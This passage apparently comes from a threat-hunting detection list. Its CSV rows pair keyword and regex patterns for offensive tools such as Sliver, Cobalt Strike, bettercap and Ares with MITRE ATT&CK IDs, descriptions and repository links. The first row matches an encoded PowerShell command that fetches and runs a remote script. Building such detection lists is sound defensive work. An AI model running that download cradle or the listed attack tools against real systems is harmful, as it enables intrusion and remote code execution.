"*aQBlAHgAIAAoAE4AZwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAvAHIAZQB2AC4AcABzADEAJwApAA*",".{0,1000}aQBlAHgAIAAoAE4AZwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAvAHIAZQB2AC4AcABzADEAJwApAA.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","278","25","2024-04-04T02:43:34Z","2021-05-11T06:26:10Z" 
"*archerysec*",".{0,1000}archerysec.{0,1000}","offensive_tool_keyword","archerysec","Archery is an opensource vulnerability assessment and management tool which helps developers and pentesters to perform scans and manage vulnerabilities. Archery uses popular opensource tools to perform comprehensive scanning for web application and network. It also performs web application dynamic authenticated scanning and covers the whole applications by using selenium. The developers can also utilize the tool for implementation of their DevOps CI/CD environment.","T1190 - T1082 - T1518","TA0003 - TA0008","N/A","N/A","Frameworks","https://github.com/archerysec/archerysec","1","0","N/A","N/A","10","2196","497","2024-04-17T05:29:16Z","2017-12-04T12:42:54Z" "*archive-*.kali.org/*",".{0,1000}archive\-.{0,1000}\.kali\.org\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*archive.torproject.org*",".{0,1000}archive\.torproject\.org.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*ArchStrike*",".{0,1000}ArchStrike.{0,1000}","offensive_tool_keyword","archstrike","Arch Linux repo containing lots of exploitation tools for pentesters","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://archstrike.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ares.py runserver*",".{0,1000}ares\.py\srunserver.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1502","474","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "*ares-master.zip*",".{0,1000}ares\-master\.zip.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","10","10","1502","474","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "*Args_Invoke_Kerberoast*",".{0,1000}Args_Invoke_Kerberoast.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","10","921","179","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z" "*armitage.exe*",".{0,1000}armitage\.exe.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. 
recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","2","110","24","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" "*armory install *",".{0,1000}armory\sinstall\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*armory install .net-execute*",".{0,1000}armory\sinstall\s\.net\-execute.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*armory install .net-pivot*",".{0,1000}armory\sinstall\s\.net\-pivot.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*armory install .net-recon*",".{0,1000}armory\sinstall\s\.net\-recon.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*armory install situational-awareness*",".{0,1000}armory\sinstall\ssituational\-awareness.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*armory install windows-bypass*",".{0,1000}armory\sinstall\swindows\-bypass.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*armory install 
windows-pivot*",".{0,1000}armory\sinstall\swindows\-pivot.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*Arno0x/DBC2*",".{0,1000}Arno0x\/DBC2.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controller running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Arno0x/EmbedInHTML*",".{0,1000}Arno0x\/EmbedInHTML.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is take a file (any type of file). encrypt it. and embed it into an HTML file as a resource. 
along with an automatic download routine simulating a user clicking on the embedded resource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","5","462","114","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*Arno0x/NtlmRelayToEWS*",".{0,1000}Arno0x\/NtlmRelayToEWS.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "*Arno0x/WebDavC2*",".{0,1000}Arno0x\/WebDavC2.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actual C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","117","84","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" "*arp.spoof on*",".{0,1000}arp\.spoof\son.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*arp.spoof.*",".{0,1000}arp\.spoof\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - 
TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*arp.spoof.targets*",".{0,1000}arp\.spoof\.targets.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*arp_mitm.py*",".{0,1000}arp_mitm\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scripts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1952","1596","2024-01-11T16:11:28Z","2021-01-07T16:11:52Z" "*arp_spoof.*",".{0,1000}arp_spoof\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*arpspoof -i *",".{0,1000}arpspoof\s\-i\s.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1364","326","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" 
"*ArpSpoofer*",".{0,1000}ArpSpoofer.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*arpspoofing.py *",".{0,1000}arpspoofing\.py\s.{0,1000}","offensive_tool_keyword","arpspoofing","arp spoofing scripts","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/arpspoofing","1","0","N/A","N/A","1","21","1","2022-03-10T04:44:36Z","2021-06-29T22:57:51Z" "*Arsenal needs TIOCSTI enable for running*",".{0,1000}Arsenal\sneeds\sTIOCSTI\senable\sfor\srunning.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*arsenal v* - Pentest command launcher*",".{0,1000}arsenal\sv.{0,1000}\s\-\sPentest\scommand\slauncher.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*arsenal_kit.cna*",".{0,1000}arsenal_kit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact.cna*",".{0,1000}artifact\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact.cna*",".{0,1000}artifact\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact.exe*",".{0,1000}artifact\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default artifact name generated by cobaltstrike. Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
"*artifact.x64.exe*",".{0,1000}artifact\.x64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact.x86.dll*",".{0,1000}artifact\.x86\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact.x86.exe*",".{0,1000}artifact\.x86\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
"*artifact_payload*",".{0,1000}artifact_payload.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*artifact_payload*",".{0,1000}artifact_payload.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifact_stageless*",".{0,1000}artifact_stageless.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*artifact_stageless*",".{0,1000}artifact_stageless.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of 
